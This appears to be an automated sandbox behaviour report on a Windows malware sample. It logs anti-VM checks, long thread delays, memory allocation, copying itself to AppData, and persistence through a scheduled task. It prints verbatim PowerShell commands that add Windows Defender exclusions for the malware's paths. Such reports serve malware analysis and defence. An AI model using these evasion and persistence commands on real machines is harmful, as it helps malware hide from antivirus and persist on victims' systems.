Source: C:\Users\user\Desktop\kzQ25HVUbf.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\kzQ25HVUbf.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\kzQ25HVUbf.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\kzQ25HVUbf.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\kzQ25HVUbf.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\kzQ25HVUbf.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\kzQ25HVUbf.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\kzQ25HVUbf.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\kzQ25HVUbf.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\kzQ25HVUbf.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\kzQ25HVUbf.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\kzQ25HVUbf.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\kzQ25HVUbf.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\kzQ25HVUbf.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\kzQ25HVUbf.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\kzQ25HVUbf.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\kzQ25HVUbf.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\kzQ25HVUbf.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\kzQ25HVUbf.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\kzQ25HVUbf.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\kzQ25HVUbf.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\kzQ25HVUbf.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\kzQ25HVUbf.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\kzQ25HVUbf.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\kzQ25HVUbf.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\kzQ25HVUbf.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\kzQ25HVUbf.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\kzQ25HVUbf.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\kzQ25HVUbf.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\kzQ25HVUbf.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\kzQ25HVUbf.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\kzQ25HVUbf.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\kzQ25HVUbf.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\kzQ25HVUbf.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\kzQ25HVUbf.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\kzQ25HVUbf.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\kzQ25HVUbf.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\kzQ25HVUbf.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\kzQ25HVUbf.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\kzQ25HVUbf.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\kzQ25HVUbf.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\kzQ25HVUbf.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\kzQ25HVUbf.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\kzQ25HVUbf.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\kzQ25HVUbf.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\kzQ25HVUbf.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\kzQ25HVUbf.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\kzQ25HVUbf.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\kzQ25HVUbf.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\kzQ25HVUbf.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\kzQ25HVUbf.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\kzQ25HVUbf.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\kzQ25HVUbf.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\kzQ25HVUbf.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\kzQ25HVUbf.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\kzQ25HVUbf.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\kzQ25HVUbf.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\kzQ25HVUbf.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\kzQ25HVUbf.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\kzQ25HVUbf.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\kzQ25HVUbf.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\kzQ25HVUbf.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\kzQ25HVUbf.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\kzQ25HVUbf.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\kzQ25HVUbf.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\kzQ25HVUbf.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\kzQ25HVUbf.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\kzQ25HVUbf.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\kzQ25HVUbf.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\kzQ25HVUbf.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\kzQ25HVUbf.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\kzQ25HVUbf.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\kzQ25HVUbf.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\kzQ25HVUbf.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\kzQ25HVUbf.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\kzQ25HVUbf.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\kzQ25HVUbf.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\kzQ25HVUbf.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\kzQ25HVUbf.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\kzQ25HVUbf.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\kzQ25HVUbf.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\kzQ25HVUbf.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\kzQ25HVUbf.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\kzQ25HVUbf.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\kzQ25HVUbf.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\kzQ25HVUbf.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\kzQ25HVUbf.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\kzQ25HVUbf.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\kzQ25HVUbf.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\kzQ25HVUbf.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\kzQ25HVUbf.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\kzQ25HVUbf.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\kzQ25HVUbf.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\kzQ25HVUbf.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\kzQ25HVUbf.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\kzQ25HVUbf.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\kzQ25HVUbf.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\kzQ25HVUbf.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\kzQ25HVUbf.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\kzQ25HVUbf.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\kzQ25HVUbf.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\kzQ25HVUbf.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\iWEWjTXiqXke.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\iWEWjTXiqXke.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\iWEWjTXiqXke.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\iWEWjTXiqXke.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\iWEWjTXiqXke.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\iWEWjTXiqXke.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\iWEWjTXiqXke.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\iWEWjTXiqXke.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\iWEWjTXiqXke.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\iWEWjTXiqXke.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\iWEWjTXiqXke.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\iWEWjTXiqXke.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\iWEWjTXiqXke.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\iWEWjTXiqXke.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\iWEWjTXiqXke.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\iWEWjTXiqXke.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\iWEWjTXiqXke.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\iWEWjTXiqXke.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\iWEWjTXiqXke.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\iWEWjTXiqXke.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\iWEWjTXiqXke.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\iWEWjTXiqXke.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\iWEWjTXiqXke.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\iWEWjTXiqXke.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\iWEWjTXiqXke.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\iWEWjTXiqXke.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\iWEWjTXiqXke.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\iWEWjTXiqXke.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\iWEWjTXiqXke.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\iWEWjTXiqXke.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\iWEWjTXiqXke.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\iWEWjTXiqXke.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\iWEWjTXiqXke.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\iWEWjTXiqXke.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\iWEWjTXiqXke.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\iWEWjTXiqXke.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\iWEWjTXiqXke.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\iWEWjTXiqXke.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\iWEWjTXiqXke.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\iWEWjTXiqXke.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\iWEWjTXiqXke.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\iWEWjTXiqXke.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\iWEWjTXiqXke.exe	Process information set: NOGPFAULTERRORBOX

Malware Analysis System Evasion

Yara detected AntiVM3

Source: Yara match

File source: Process Memory Space: kzQ25HVUbf.exe PID: 7568, type: MEMORYSTR

Source: C:\Users\user\Desktop\kzQ25HVUbf.exe	Memory allocated: 1280000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Users\user\Desktop\kzQ25HVUbf.exe	Memory allocated: 2CA0000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Users\user\Desktop\kzQ25HVUbf.exe	Memory allocated: 4CA0000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Users\user\Desktop\kzQ25HVUbf.exe	Memory allocated: 7DB0000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Users\user\Desktop\kzQ25HVUbf.exe	Memory allocated: 7370000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Users\user\Desktop\kzQ25HVUbf.exe	Memory allocated: 8DB0000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Users\user\Desktop\kzQ25HVUbf.exe	Memory allocated: 9DB0000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Users\user\AppData\Roaming\iWEWjTXiqXke.exe	Memory allocated: CA0000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Users\user\AppData\Roaming\iWEWjTXiqXke.exe	Memory allocated: 28B0000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Users\user\AppData\Roaming\iWEWjTXiqXke.exe	Memory allocated: 2710000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Users\user\AppData\Roaming\iWEWjTXiqXke.exe	Memory allocated: 7070000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Users\user\AppData\Roaming\iWEWjTXiqXke.exe	Memory allocated: 8070000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Users\user\AppData\Roaming\iWEWjTXiqXke.exe	Memory allocated: 8200000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Users\user\AppData\Roaming\iWEWjTXiqXke.exe	Memory allocated: 9200000 memory reserve \| memory write watch	Jump to behavior

Source: C:\Users\user\Desktop\kzQ25HVUbf.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Users\user\AppData\Roaming\iWEWjTXiqXke.exe	Thread delayed: delay time: 922337203685477	Jump to behavior

Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Window / User API: threadDelayed 3049			Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Window / User API: threadDelayed 5086			Jump to behavior

Source: C:\Users\user\Desktop\kzQ25HVUbf.exe TID: 7588	Thread sleep time: -922337203685477s >= -30000s	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 8112	Thread sleep time: -2767011611056431s >= -30000s	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 8068	Thread sleep time: -1844674407370954s >= -30000s	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 8152	Thread sleep time: -2767011611056431s >= -30000s	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 8104	Thread sleep time: -922337203685477s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\kzQ25HVUbf.exe TID: 8080	Thread sleep count: 82 > 30	Jump to behavior
Source: C:\Users\user\Desktop\kzQ25HVUbf.exe TID: 8080	Thread sleep time: -4920000s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Roaming\iWEWjTXiqXke.exe TID: 5940	Thread sleep time: -922337203685477s >= -30000s	Jump to behavior

Source: C:\Windows\System32\conhost.exe	Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe	Last function: Thread delayed

Source: C:\Users\user\Desktop\kzQ25HVUbf.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Users\user\Desktop\kzQ25HVUbf.exe	Thread delayed: delay time: 60000	Jump to behavior
Source: C:\Users\user\AppData\Roaming\iWEWjTXiqXke.exe	Thread delayed: delay time: 922337203685477	Jump to behavior

Source: kzQ25HVUbf.exe, 00000009.00000002.2599826516.0000000001078000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dllz3
Source: iWEWjTXiqXke.exe, 00000012.00000002.1570258791.0000000001468000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll

Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

Process information queried: ProcessInformation

Jump to behavior

Source: C:\Users\user\AppData\Roaming\iWEWjTXiqXke.exe

Code function: 18_2_0040317B mov eax, dword ptr fs:[00000030h]

18_2_0040317B

Source: C:\Users\user\AppData\Roaming\iWEWjTXiqXke.exe

Code function: 18_2_00402B7C GetProcessHeap,HeapAlloc,

18_2_00402B7C

Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process token adjusted: Debug	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process token adjusted: Debug	Jump to behavior
Source: C:\Users\user\Desktop\kzQ25HVUbf.exe	Process token adjusted: Debug	Jump to behavior

Source: C:\Users\user\Desktop\kzQ25HVUbf.exe

Memory allocated: page read and write | page guard

Jump to behavior

HIPS / PFW / Operating System Protection Evasion

Adds a directory exclusion to Windows Defender

Source: C:\Users\user\Desktop\kzQ25HVUbf.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\kzQ25HVUbf.exe"
Source: C:\Users\user\Desktop\kzQ25HVUbf.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\iWEWjTXiqXke.exe"
Source: C:\Users\user\Desktop\kzQ25HVUbf.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\kzQ25HVUbf.exe"	Jump to behavior
Source: C:\Users\user\Desktop\kzQ25HVUbf.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\iWEWjTXiqXke.exe"	Jump to behavior

Source: C:\Users\user\Desktop\kzQ25HVUbf.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\kzQ25HVUbf.exe"	Jump to behavior
Source: C:\Users\user\Desktop\kzQ25HVUbf.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\iWEWjTXiqXke.exe"	Jump to behavior
Source: C:\Users\user\Desktop\kzQ25HVUbf.exe	Process created: C:\Windows\SysWOW64\schtasks.exe "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\iWEWjTXiqXke" /XML "C:\Users\user\AppData\Local\Temp\tmp53FD.tmp"	Jump to behavior
Source: C:\Users\user\Desktop\kzQ25HVUbf.exe	Process created: C:\Users\user\Desktop\kzQ25HVUbf.exe "C:\Users\user\Desktop\kzQ25HVUbf.exe"	Jump to behavior
Source: C:\Users\user\AppData\Roaming\iWEWjTXiqXke.exe	Process created: C:\Windows\SysWOW64\schtasks.exe "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\iWEWjTXiqXke" /XML "C:\Users\user\AppData\Local\Temp\tmp851F.tmp"	Jump to behavior
Source: C:\Users\user\AppData\Roaming\iWEWjTXiqXke.exe	Process created: C:\Users\user\AppData\Roaming\iWEWjTXiqXke.exe "C:\Users\user\AppData\Roaming\iWEWjTXiqXke.exe"	Jump to behavior
Source: C:\Users\user\AppData\Roaming\iWEWjTXiqXke.exe	Process created: C:\Users\user\AppData\Roaming\iWEWjTXiqXke.exe "C:\Users\user\AppData\Roaming\iWEWjTXiqXke.exe"	Jump to behavior

Source: C:\Users\user\Desktop\kzQ25HVUbf.exe	Queries volume information: C:\Users\user\Desktop\kzQ25HVUbf.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\kzQ25HVUbf.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\kzQ25HVUbf.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\kzQ25HVUbf.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Accessibility\v4.0_4.0.0.0__b03f5f7f11d50a3a\Accessibility.dll VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\kzQ25HVUbf.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\kzQ25HVUbf.exe	Queries volume information: C:\Windows\Fonts\micross.ttf VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-AppManagement-AppV-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
